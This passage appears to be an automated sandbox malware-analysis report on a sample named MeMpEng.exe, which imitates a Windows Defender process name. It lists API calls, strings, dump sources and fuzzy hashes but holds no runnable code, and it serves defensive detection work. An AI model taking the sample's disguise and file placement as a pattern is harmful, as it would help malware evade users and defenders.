                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call
                                                          • API String ID: 2624150263-1755421812
                                                          • Opcode ID: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                                          • Instruction ID: db18d61dd8e36d4389a3b44505c0f864e6ca322f8728bcf89e652d7f1c678b9a
                                                          • Opcode Fuzzy Hash: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                                          • Instruction Fuzzy Hash: 25A185B1900208ABDB11AFA5DD45BEFB7B8EF84314F11403BF611B62D1D77C9A418B69
                                                          APIs
                                                          Strings
                                                          • *?|<>/":, xrefs: 00406854
                                                          • "C:\Users\user\AppData\Roaming\MeMpEng.exe" , xrefs: 00406846
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-2772899653
                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EA9
                                                          • GetMessagePos.USER32 ref: 00404EB1
                                                          • ScreenToClient.USER32(?,?), ref: 00404ECB
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EDD
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F03
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction ID: 20ba1dd8c6eb147b8de8e184d932bb38cbf2a2b27d4ef3642ae6e6b093867634
                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction Fuzzy Hash: D6015E72900219BADB00DB95DD85FFEBBBCAF95711F10412BBB51B61D0C7B49A018BA4
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E76
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                          • MulDiv.KERNEL32 ref: 00401E98
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                          • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                          • Instruction ID: 03fa82d4c3f414405e360d431a269216209ac9bc2718b2d324fdabe448a9bb24
                                                          • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                          • Instruction Fuzzy Hash: 28018471954250EFEB015BB4AE89BDD3FB4AF59301F10497AF142BA1E2CAB90444DB3D
                                                          APIs
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040300B
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                          • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                                          • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                          • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                                          APIs
                                                            • Part of subcall function 6A2B12BB: GlobalAlloc.KERNELBASE(00000040,?,6A2B12DB,?,6A2B137F,00000019,6A2B11CA,-000000A0), ref: 6A2B12C5
                                                          • GlobalFree.KERNEL32(?), ref: 6A2B2743
                                                          • GlobalFree.KERNEL32(00000000), ref: 6A2B2778
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 05aaa8d8e3c23717bc2119ecb0a0436037038f2646661f0d474c754a49a59cad
                                                          • Instruction ID: 36860c3e35540a5e78ccdbccb26b1f59458f5d9617bc3cca397a57951dd6a631
                                                          • Opcode Fuzzy Hash: 05aaa8d8e3c23717bc2119ecb0a0436037038f2646661f0d474c754a49a59cad
                                                          • Instruction Fuzzy Hash: D231B0F158420AEFCB2A8F54C8D8C2A77F6EB8738D35549A9F141C7650CB30E845EB65
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                          • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                          • CloseHandle.KERNEL32(?), ref: 00402A5A
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                          • Instruction ID: 5c013e3641f51b8511de27967d5ac64a9b846b719b0e1cdf51d049a21d65d460
                                                          • Opcode Fuzzy Hash: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                          • Instruction Fuzzy Hash: 3D31B171D00128BBCF21AFA5CE4999E7E79AF45324F10423AF511762E1CB794D419F98
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 9a350fc8dbd50e30de9891ada20ec39ce8ab13d7a790a5c8d58b2de29be3eb9f
                                                          • Instruction ID: 9b9873c27f077cba5b805da3a6f89eae19c4b3dde32fc2e5c618f47b647f77dd
                                                          • Opcode Fuzzy Hash: 9a350fc8dbd50e30de9891ada20ec39ce8ab13d7a790a5c8d58b2de29be3eb9f
                                                          • Instruction Fuzzy Hash: 8251E532DD411EFBCB189FA8845499DBAB6EB413CDF02815AD408A3211EF70EAC5C7B1
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 6A2B25C2
                                                            • Part of subcall function 6A2B12CC: lstrcpynW.KERNEL32(00000000,?,6A2B137F,00000019,6A2B11CA,-000000A0), ref: 6A2B12DC
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 6A2B2548
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6A2B2563
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: df44f608db2de586db2180bc3088e15e14cd801b826dddc254d72e8c98f54101
                                                          • Instruction ID: 11f7d2a1e17b24196d9ed4d29d30e47e9f17cb7a4d6be786fb42affd6d2ab2ad
                                                          • Opcode Fuzzy Hash: df44f608db2de586db2180bc3088e15e14cd801b826dddc254d72e8c98f54101
                                                          • Instruction Fuzzy Hash: 504180F1084309EFD728DF24D898A6677F8FB4539DF01499DE94686981EF30E944CB61
                                                          APIs
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402F22
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402F77
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402F99
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction ID: 9b286c5d8e76f57eb0c9cc6cf8757f48d710680964e76fdf16ae971aa0981de0
                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction Fuzzy Hash: 64215A7150010ABFDF129F90CE89EEF7A7DEB14398F110076B909B21A0D7B48E54AA64
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                          • GetClientRect.USER32 ref: 00401E0A
                                                          • LoadImageW.USER32 ref: 00401E3A
                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                                          • Instruction ID: bf706e621430f2b8e1e8296bf8ea73d697ba0e02d4cfc8f60e3200fcd9798b2c
                                                          • Opcode Fuzzy Hash: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                                          • Instruction Fuzzy Hash: 57212A72904119AFCB05DF94DE45AEEBBB5EB08300F14403AF945F62A0DB389D81DB98
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6A2B22D8,?,00000808), ref: 6A2B16D5
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6A2B22D8,?,00000808), ref: 6A2B16DC
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6A2B22D8,?,00000808), ref: 6A2B16F0
                                                          • GetProcAddress.KERNEL32(6A2B22D8,00000000,?,00000000,6A2B22D8,?,00000808), ref: 6A2B16F7
                                                          • GlobalFree.KERNEL32(00000000), ref: 6A2B1700
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 680420be203cc7c01a6c1cd1c5472c3bcbeb64178a85107db15f66e2aadc4cdf
                                                          • Instruction ID: 408d93f55055b897c9f70073efe4cf2e095b81af40099e7de344c179f76220d7
                                                          • Opcode Fuzzy Hash: 680420be203cc7c01a6c1cd1c5472c3bcbeb64178a85107db15f66e2aadc4cdf
                                                          • Instruction Fuzzy Hash: B9F01C722461387BDA2016A69C8CDABBE9CEF8B2F9B110615F628D229086615C01D7F1
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
